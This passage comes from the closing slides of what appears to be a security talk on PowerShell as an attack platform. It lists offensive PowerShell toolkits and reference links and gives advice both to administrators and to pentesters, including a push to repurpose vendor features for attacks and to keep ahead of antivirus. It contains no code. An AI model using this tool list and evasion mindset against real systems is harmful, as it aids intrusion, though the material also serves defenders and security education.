– Note: Use only on your system. DO NOT SEND TO ANYONE ELSE. I will not
accept any responsibility for your actions. Your actions, your responsibility. I
have warned you.
– http://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-
windows-powershell/
36. Powered by PowerShell
• Existing PowerShell based attack tools
– Metasploit PowerShell modules
– PowerSploit
– Nishang
– PowerSyringe
• Recommended Reads and References
– PowerShell for Pentesters
• http://pen-testing.sans.org/blog/2012/04/27/presentation-powershell-for-pen-testers
– PowerShell OMFG
• https://www.trustedsec.com/august-2010/powershell_omfg/
– PowerShell Code Repository
• http://poshcode.org/
– Windows PowerShell Cookbook
• By Lee Holmes
– Server 2008 Group Policy Preferences (GPP) – And how they get your domain 0wned
• By Chris Gates (carnal0wnage)
• http://www.slideshare.net/chrisgates/exploiting-group-policy-preferences
37. And to conclude
• Sys admins/Network admins/Managers
– Check out every new feature introduced by a vendor
– Is it necessary for your org? No? Remove/Disable it.
– Ensure AV is installed and updated on production environment.
– Attend more security conferences to find out what new tech the
hackers could use to attack your organisation.
• Hacker/Pentesters
– Check out every new feature introduced by a vendor
– Look at how you can twist various features to do your bidding
– Don’t rely on your attacks tools
– Remember AV vendors are watching and catching up
– Push yourself – come up with innovative tech
– Communicate all new tech u find. Our community is very open. You
could end up finding an even better way to attack.